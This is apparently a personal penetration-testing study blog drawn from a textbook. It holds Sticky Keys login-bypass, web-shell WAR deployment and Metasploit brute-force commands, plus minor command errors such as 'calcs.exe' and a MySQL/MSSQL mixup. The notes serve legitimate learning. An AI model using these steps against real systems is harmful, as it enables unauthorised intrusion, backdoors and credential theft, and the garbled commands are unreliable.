Scanning the network for open ports.

 Exploring My Network with Nmap

A couple of days ago, I used a tool called Wifite to crack the Wi-Fi password for my wireless access point. Today, I’m diving deeper into my network using a few commands.

First, I executed the following command to scan for open ports:

bash

sudo nmap -p 22,80,443 192.168.8.1/24

This command revealed open ports on several IP addresses within my network:

192.168.8.1 – GL Technologies

Port 22: SSH

Port 80: HTTP

192.168.8.178 – Raspberry Pi

Port 22: SSH

Port 80: HTTP

When I attempted to connect to 192.168.8.178, I encountered a website titled "McCabe Cousins."

Next, I ran a more comprehensive scan with the command:

bash

sudo nmap -p 1-65535 192.168.8.178

This scan provided a list of open ports:

Port 22

Port 23

Port 80

Port 9000

Port 32967

Interestingly, it seems there is a game called Zork running on port 23! Additionally, I found that Portainer.io is active on port 9000, and a File Browser service is running on port 32967.

Stay tuned as I continue to explore my network and uncover more insights! Feel free to adjust any part of the text to better fit your style or preferences!

* This blog entry was formatted using perplexity.ai

“Yes, you may use the content provided in your blog at the specified URL. You can modify it as needed to fit your style or add any additional insights you wish to include. If you have any specific changes or further content you'd like to develop, feel free to ask!”

Key Commands and Techniques in Network Penetration Testing: Insights from The Art of Network Penetration Testing

In network penetration testing, understanding the system environment and being able to execute specific commands can be crucial in gathering information and performing various actions. The book The Art of Network Penetration Testing by Royce Davis offers several techniques for gathering information from both Windows and Linux systems. These commands can help testers assess the system’s state and potentially uncover vulnerabilities. Below are some essential commands and an interesting security bypass technique:

Commands for Gathering Information

For Windows Systems:

• IP Address Information:
  Ipconfig /all
• Environment Variables:
  Set
• List Current Directory:
  Dir /ah
• Copy a File:
  Copy from to
• Search a File for a String:
  Type file | find /I string
• List Running Processes:
  Tasklist /v
• Display a File’s Contents:
  Type file

For Linux Systems:

• IP Address Information:
  Ifconfig
• Environment Variables:
  Export
• List Current Directory:
  Ls –lah
• Copy a File:
  Cp from to
• Search a File for a String:
  Cat file | grep string
• List Running Processes:
  Ps aux
• Display a File’s Contents:
  Cat file

Sticky Keys Exploit

An interesting technique for bypassing the Windows login screen involves the Sticky Keys feature, which can be exploited by replacing the system file sethc.exe with cmd.exe. This allows an attacker to trigger a command prompt by pressing Shift five times before the login screen, granting them administrative access.

To exploit this vulnerability, the following command can be executed to grant full control over the sethc.exe file:

bash
Cmd.exe /C echo Y | c:\windows\system32\calcs.exe c:\windows\system32\sethc.exe /E /G BUILTIN\Administrators:F

This command uses the cacls.exe utility to modify the file’s permissions, changing it from read-only (R) to full-control (F) for the BUILTIN\Administrators group. However, note that modern versions of Windows may have protections in place to prevent this type of exploit.

Conclusion

As network penetration testers, understanding the environment and knowing the key commands for both Windows and Linux systems is fundamental. Additionally, methods like the Sticky Keys exploit, although patched in recent versions of Windows, serve as reminders of the importance of securing user access points.

For more in-depth penetration testing techniques, The Art of Network Penetration Testing by Royce Davis is a valuable resource. The techniques discussed above (pages 95-96) provide testers with powerful tools for assessing system security and identifying potential vulnerabilities.

Capturing a WPA2 Handshake

I recently captured a WPA2 handshake for a wireless test network using wifite with the --no-wps --no-pmkid options. The captured file was uploaded to an online service for password analysis.

This process demonstrates the importance of using strong, secure passwords to protect Wi-Fi networks. Stay tuned for updates and more cybersecurity insights! 

12/21/2024

 Focused Penetration Testing: Creating a Malicious Web Shell Backdoor

In this blog post, we will dive into two critical techniques in penetration testing: creating a web shell application and using a script console as a backdoor payload. These methods are commonly used for web application exploitation and gaining remote access to servers.

Step-by-Step Guide: Creating a Malicious Web Shell WAR File

A web shell is a powerful tool that allows attackers to execute commands on a vulnerable server remotely. One of the most effective ways to deploy a web shell is by using a WAR file (Web Application Archive) on an Apache Tomcat web server. Below is a detailed guide on how to create and deploy a malicious WAR file containing a simple web shell.

1. Setting Up the Web Shell Directory

Begin by creating a directory on your local machine for the web shell files. You can use the following commands:

bash
mkdir webshell
cd webshell

2. Creating the Web Shell Script

Next, create the index.jsp file where the malicious code will reside. This file will act as your web shell. Use the command below to create the file:

bash
touch index.jsp

Open the index.jsp file and copy the malicious script (found on page 90 of your reference) into it. This script allows for remote command execution on the server once the web shell is uploaded.

3. Packaging the Web Shell into a WAR File

To package the web shell into a WAR file, use the following command to generate the archive:

bash
jar cvf ../webshell.war *

This will create a webshell.war file that contains your index.jsp and any other necessary files.

4. Uploading the WAR File to Apache Tomcat

Once the WAR file is created, you need to upload it to your Tomcat Apache server. Typically, the WAR file is placed in the webapps directory of the Tomcat server. You can do this via FTP or through other secure file transfer methods.

5. Accessing and Executing the Web Shell

After uploading the WAR file, you will need to navigate to the URL of the server where the WAR file was uploaded. In some cases, you may need to make the file executable for it to function correctly. Once executed, the web shell will provide remote access to the server, allowing you to run commands and further exploit the system.

Conclusion: Effective Use of Web Shells in Penetration Testing

By following these steps, you can successfully create and deploy a web shell on an Apache Tomcat server. This method is an essential technique in penetration testing for gaining access to vulnerable web servers. Always remember to use these tools ethically and only in environments where you have explicit permission to conduct security testing.

12/18/2024

Windows 7 and Windows Server 2008 R2 are vulnerable to the Eternal Blue exploit. Use the following command in Metasploit:

bash
use auxiliary/scanner/smb/smb_ms17_010
set rhosts file:/home/we6jbo/windows.txt
run

The string "Professional 7601 Service Pack 1 x64" is a potential indicator of an Eternal Blue vulnerability.
To try a variety of passwords, use this command:

bash
cme smb discovery/hosts/windows.txt --local-auth -u Administrator -p passwords.txt

To attack a MySQL server, use the following command:

bash
use auxiliary/scanner/mssql/mssql_login
set username sa
set pass_file /home/we6jbo/password.txt
set rhosts file:/home/we6jbo/mssql.txt
run

If you get the error "Unsupported target", try this alternative command:

bash
medusa -M mysql -H discovery/hosts/mysql.txt -u root -P password.txt

This confirms if the IP is blocked. Brute-forcing VNC can be achieved using the following command:

bash
use auxiliary/scanner/vnc/vnc_login
set rhosts file:/home/we6jbo/vnc.txt
set pass_file /home/we6jbo/passwords.txt
run

WAR Files:
WAR stands for Web Application Archive, often used with Apache Tomcat.

Webshot Tool:
Webshot uses an XML file to take screenshots of websites. To set it up:

bash
git clone https://github.com/R3dy/webshot.git
cd webshot
bundle install
gem install thread
wget http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.54-lubuntu1.1_amd64.deb
sudo dpkg -i libpng12-0_1.2.54-lubuntu1.1_amd64.deb

To run Webshot:

bash
./webshot.rb -h
~/git/webshot/webshot.rb -t discovery/services/web.xml -o documentation/screenshots

information is for educational purposes only and should only be used in environments where you have explicit permission

Please be responsible and focus on securing systems and understanding vulnerabilities rather than exploiting them maliciously
Using these techniques without authorization is illegal and unethical.

12/15/2024

Network Scanning and Vulnerability Detection with Nmap and Ruby

Nmap Commands for IP Discovery

To perform a network sweep for active IPs, you can use the following Nmap command. This will scan a list of IP ranges and output the results to a file:

bash
sudo nmap -sn -iL discovery/range.txt -oA discovery/hosts/pingsweep -PE

Next, use grep to extract only the IPs that are up:

bash
grep "Up" pingsweep.gnmap | cut -d " " -f2 > targets.txt

Note: Running these commands will alert the Network Operations Center (NOC) that someone is scanning the network.

Common Open Ports

When scanning networks, certain ports are typically open:

• Microsoft Remote Desktop (TCP 3389)
• Secure Shell (SSH) (TCP 22, 2222)
• HTTP/HTTPS (TCP 80, 443)

Scan Specific Ports

To scan for common ports (22, 80, 443, 3389, 2222), use the following Nmap command:

bash
nmap -Pn -n -p 22,80,443,3389,2222 -iL discovery/range.txt -oA discovery/hosts/rmisweep --min-hostgroup 256 --min-rate 1280

To view the open ports from the scan, use cat:

bash
cat discovery/hosts/rmisweep.gnmap | grep open | cut -d " " -f2

Alternative Methods for Finding IPs

You can also find IPs by obtaining the reverse IP from a DNS server. For example, to resolve the host mail.jeremiahonealtechsupport.com, you can run a reverse DNS lookup.

Scan a Subnet

To scan a specific subnet, use this Nmap command:

bash
sudo nmap -sn 10.0-255.0-255.1 -PE --min-hostgroup 10000 --min-rate 10000

Discover Network Services

To sweep for open ports across a list of hosts, use the following Nmap command:

bash
nmap -Pn -n -p 22,25,53,80,443,445,1433,3306,3389,4800,5900,8080,8443 -iL hosts/targets.txt -oA services/quick-sweep

To check for open ports in the scan results, use this command:

bash
cat services/quick-sweep.gnmap | grep open

To perform a full TCP scan on all ports, use:

bash
nmap -Pn -n -iL hosts/targets.txt -p 0-65535 -sV -A -oA services/full-sweep --min-rate 50000 --min-hostgroup 22

Ruby Script to Parse Nmap Results

Here’s a Ruby script that parses Nmap’s XML output and extracts information about open ports:

ruby
#!/usr/bin/env ruby
require 'rubygems'
require 'nmap/parser'

# Check for input argument
if ARGV.empty?
  puts "Usage: #{$PROGRAM_NAME} <nmap_xml_output>"
  exit(1)
end

# Parse Nmap XML file
nmap_file = ARGV[0]
parser = Nmap::Parser.parsefile(nmap_file)

# Iterate through hosts
parser.hosts("up") do |host|
  portstring = ""

  # Iterate through open ports
  host.ports("open") do |port|
    service = port.service
    # Print port details
    puts "#{host.addr}, #{port.num}, #{service.name}, #{service.product}, #{service.version}, #{service.extrainfo}"

    # Build a comma-separated list of ports for later use
    portstring << "#{port.num},"
  end

  # Generate Nmap command for further enumeration
  unless portstring.empty?
    puts "sudo nmap -sS -p #{portstring.chop} -sV -A -vv -oA enumeration -iL ranges.txt"
  end
end

Export Full Sweep Results to CSV

To convert the full-sweep results into a CSV file, use the following:

bash
parseenmap services/full-sweep.xml > services/all-ports.csv

---

EternalBlue (MS17-010) Vulnerability

MS17-010, also known as the EternalBlue vulnerability, is a critical flaw in Microsoft’s SMBv1 protocol, patched in March 2017. Exploited by the EternalBlue exploit, it allows remote code execution (RCE) on unpatched systems, enabling attackers to gain SYSTEM-level access and propagate malware across networks. EternalBlue was used in the WannaCry and NotPetya ransomware attacks, which disrupted systems globally by targeting vulnerable SMBv1 services. To detect this vulnerability, use Nmap’s smb-vuln-ms17-010 script to scan port 445. Mitigation involves applying the MS17-010 patch, disabling SMBv1, and restricting access to SMB ports. This incident highlights the importance of patching systems and disabling outdated protocols to prevent widespread exploitation and worm-like propagation.

Dec 12, 2024

 Enumerating information on the network such as hostnames and IP addresses. Create a file called test.txt and a file called ignore.txt. For legal reasons, ignore.txt should never be tested.

Footprinting: Enumerating information with no knowledge about system.

https://github.com/r3dy/capsulecorp-pentest

Pingsweep:

for octet in {1..254}; do ping -c 1 192.168.8.$octet -W 1 >> pingsweep.txt & done

cat pingsweep.txt | grep “bytes from” |cut -d “ “ -f4 |cut -d “:” -f1 > targets.txt

cat targets.txt